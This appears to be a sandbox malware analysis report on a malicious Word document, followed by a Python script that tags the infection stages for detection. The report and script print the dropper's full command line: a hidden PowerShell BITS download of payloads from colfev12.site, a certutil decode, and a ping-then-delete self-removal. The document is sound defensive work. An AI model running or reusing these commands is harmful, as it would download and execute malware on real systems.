Analysis
-
Max time kernel: 122s
Resource: win7v191014
Submitted: 05-12-2019 20:53

Task: task1
Sample: Docs_92ebafcc950619596e93a4215d05e6cb.doc
Resource: win7v191014
0 signatures
General
Malware Config
Extracted
Language: ps1
Source: URLs
  exe.dropper  http://colfev12.site/Bijka.dat
  exe.dropper  http://colfev12.site/sfera.dat
  exe.dropper  http://colfev12.site/oYWE.dat
Signatures
-
Suspicious use of SetWindowsHookEx (3 IoCs)
Processes:
  PID 1516  WINWORD.EXE
  PID 1444  conhost.exe
  PID 1556  conhost.exe
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  Token: SeDebugPrivilege  PID 880  powershell.exe
  Token: SeDebugPrivilege  PID 384  powershell.exe
-
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  PID 880   powershell.exe
  PID 384   powershell.exe
  PID 1876  blow.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
Processes:
  PID 1400  blow.exe
-
Drops file in System32 directory (4 IoCs)
Processes:
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
  File deleted                  C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD  WINWORD.EXE
  File created                  C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD  WINWORD.EXE
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
-
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
-
Checks for installed software on the system (1 TTP, 34 IoCs)
Processes:
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName
  Key opened         \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
  Key opened         \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
  Key enumerated     \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  Key enumerated     \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
  Key opened         \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName
  Key opened         \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}\DisplayName
  Key queried        \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName
  Key opened         \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
-
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  PID 1516  WINWORD.EXE
-
Suspicious use of SetThreadContext (1 IoC)
Processes:
  PID 1876 (blow.exe) set thread context of PID 1400 (blow.exe)
-
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Drops file in Windows directory (2 IoCs)
Processes:
  File created (read-only)  C:\Windows\cer112F.tmp  certutil.exe
  File deleted              C:\Windows\cer112F.tmp  certutil.exe
-
Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  PID 384  (powershell.exe)  wrote to memory of PID 1876 (blow.exe)
  PID 1876 (blow.exe)        wrote to memory of PID 1400 (blow.exe)
  PID 1400 (blow.exe)        wrote to memory of PID 1756 (cmd.exe)
  PID 1756 (cmd.exe)         wrote to memory of PID 1680 (PING.EXE)
Processes
-
[depth 1] C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_92ebafcc950619596e93a4215d05e6cb.doc"
  - Suspicious use of SetWindowsHookEx
  - Drops file in System32 directory
  - Suspicious behavior: AddClipboardFormatListener
-
[depth 1] C:\Windows\system32\cmd.exe
  Command line: cmd /c powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\" & certutil -decode %temp%\dera %temp%\dera.exe & powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in System32 directory

  [depth 2] C:\Windows\system32\certutil.exe
    Command line: certutil -decode C:\Users\Admin\AppData\Local\Temp\dera C:\Users\Admin\AppData\Local\Temp\dera.exe
    - Drops file in Windows directory

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Users\Admin\AppData\Local\Temp\blow.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\blow.exe" dera.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Users\Admin\AppData\Local\Temp\blow.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\blow.exe"
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\blow.exe"
          - Suspicious use of WriteProcessMemory

          [depth 6] C:\Windows\SysWOW64\PING.EXE
            Command line: ping 127.0.0.1
            - Runs ping.exe
-
[depth 1] C:\Windows\system32\conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe "13736575861871489881-16881607701145638119-1445741727-334327988-15014401241888056553"
  - Suspicious use of SetWindowsHookEx
-
[depth 1] C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  Command line: "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
-
[depth 1] C:\Windows\system32\conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe "37956094-1825198222-58501999118936678274608593271658810211556128713-1808702404"
  - Suspicious use of SetWindowsHookEx
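Detection logic run over the command lines in the tree above, as an added example that is not part of the sandbox report. It tags each stage the chain uses (BITS download into %TEMP%, certutil -decode, Start-Process from %TEMP%, ping-then-del), pairs every Start-BitsTransfer -Source URL with its -Destination path so the three exe.dropper URLs in the Malware Config can be tied to blow.exe, dera and oYWE.exe, and checks that the file deleted by the ping && del command is the image of an ancestor process, which is what separates self-deletion from ordinary cleanup. The process records are constructed from the report; PIDs 9001 (cmd.exe) and 9002 (certutil.exe) are placeholders because the report does not print them, and the report shows cmd.exe at depth 1 rather than under WINWORD.EXE, so its parent is left unset. Parent links for the rest follow the WriteProcessMemory table (384 -> 1876 -> 1400 -> 1756 -> 1680).

```python
"""Stage tagging for the process chain in the report above (added example).

Records are constructed from the report's Processes section. PIDs come from
the signature tables where given; 9001 and 9002 are HYPOTHETICAL placeholders.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

TEMP = r"C:\Users\Admin\AppData\Local\Temp"


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]   # None when the report does not show a parent
    image: str
    cmdline: str


PROCS: List[Proc] = [
    Proc(1516, None, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "'
         + TEMP + r'\Docs_92ebafcc950619596e93a4215d05e6cb.doc"'),
    Proc(9001, None, r"C:\Windows\system32\cmd.exe",  # HYPOTHETICAL pid
         r'cmd /c powershell -windowstyle hidden -command Import-Module BitsTransfer; '
         r'Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,'
         r'http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat '
         r'-Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\" '
         r'& certutil -decode %temp%\dera %temp%\dera.exe '
         r'& powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; '
         r'Start-Process blow.exe -ArgumentList dera.exe'),
    Proc(880, 9001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'powershell -windowstyle hidden -command Import-Module BitsTransfer; '
         r'Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,'
         r'http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat '
         r'-Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\"'),
    Proc(9002, 9001, r"C:\Windows\system32\certutil.exe",  # HYPOTHETICAL pid
         "certutil -decode " + TEMP + r"\dera " + TEMP + r"\dera.exe"),
    Proc(384, 9001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; '
         r'Start-Process blow.exe -ArgumentList dera.exe'),
    Proc(1876, 384, TEMP + r"\blow.exe", '"' + TEMP + r'\blow.exe" dera.exe'),
    Proc(1400, 1876, TEMP + r"\blow.exe", '"' + TEMP + r'\blow.exe"'),
    Proc(1756, 1400, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "' + TEMP + r'\blow.exe"'),
    Proc(1680, 1756, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1"),
]

RULES = {
    # BITS used as a downloader that writes straight into %TEMP%
    "bits_download_to_temp": re.compile(r"Start-BitsTransfer.*-Source\s+https?://.*\$env:TEMP", re.I),
    # certutil abused as a base64 decoder (the report shows it producing dera.exe)
    "certutil_decode": re.compile(r"\bcertutil(?:\.exe)?\b.*-decode", re.I),
    # PowerShell changing into %TEMP% and launching a freshly dropped binary
    "start_process_from_temp": re.compile(r'Set-Location\s+-Path\s+\\?"?\$env:TEMP.*Start-Process', re.I),
    "hidden_window": re.compile(r"-windowstyle\s+hidden", re.I),
    # ping as a sleep, then del of an .exe: the usual self-removal idiom
    "ping_then_del": re.compile(r'ping\s+127\.0\.0\.1\s*&&\s*del\s+"?([^"]+?\.exe)"?', re.I),
}


def tag(cmdline: str) -> Set[str]:
    """Names of every rule that matches one command line."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}


def stage_report(procs: List[Proc]) -> Dict[int, List[str]]:
    """pid -> sorted tags, for processes that matched at least one rule."""
    return {p.pid: sorted(tag(p.cmdline)) for p in procs if tag(p.cmdline)}


def bits_transfers(cmdline: str) -> List[Tuple[str, str]]:
    """Pair each -Source URL with its -Destination path (both lists are
    comma-separated and matched by position)."""
    m = re.search(r"-Source\s+(\S+)\s+-Destination\s+(\S+)", cmdline, re.I)
    if not m:
        return []
    sources = m.group(1).split(",")
    # the sandbox renders the quotes escaped as \" ; strip both characters
    dests = [d.strip('\\"') for d in m.group(2).split(",")]
    return list(zip(sources, dests))


def ancestors(procs: List[Proc], pid: int):
    by_pid = {p.pid: p for p in procs}
    p = by_pid.get(pid)
    while p is not None and p.ppid is not None:
        p = by_pid.get(p.ppid)
        if p is not None:
            yield p


def self_delete_targets(procs: List[Proc]) -> List[Tuple[int, str, Optional[int]]]:
    """(pid, deleted path, pid of the ancestor whose image is that path, or None).
    A ping && del aimed at an ancestor's own image is self-deletion; the same
    idiom against an unrelated file is just cleanup."""
    out = []
    for p in procs:
        m = RULES["ping_then_del"].search(p.cmdline)
        if not m:
            continue
        target = m.group(1)
        owner = next((a.pid for a in ancestors(procs, p.pid)
                      if a.image.lower() == target.lower()), None)
        out.append((p.pid, target, owner))
    return out


if __name__ == "__main__":
    for pid, tags in stage_report(PROCS).items():
        print(pid, ", ".join(tags))
    for url, dest in bits_transfers(PROCS[1].cmdline):
        print(url, "->", dest)
    print(self_delete_targets(PROCS))
```

The rules are keyed on the command-line shapes the report shows, not on the file names, so renaming blow.exe or dera does not evade them; the self-deletion check relies on parent links, which is why the two placeholder PIDs are only needed for the cmd.exe and certutil.exe records the report prints without a PID.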
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
-
C:\Users\Admin\AppData\Local\Temp\dera.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
-
memory/1400-9-0x0000000000080000-0x00000000000DD000-memory.dmp  (filesize 372KB)
-
memory/1400-10-0x0000000000080000-0x00000000000DD000-memory.dmp  (filesize 372KB)
-
memory/1516-0-0x0000000006500000-0x0000000006504000-memory.dmp  (filesize 16KB)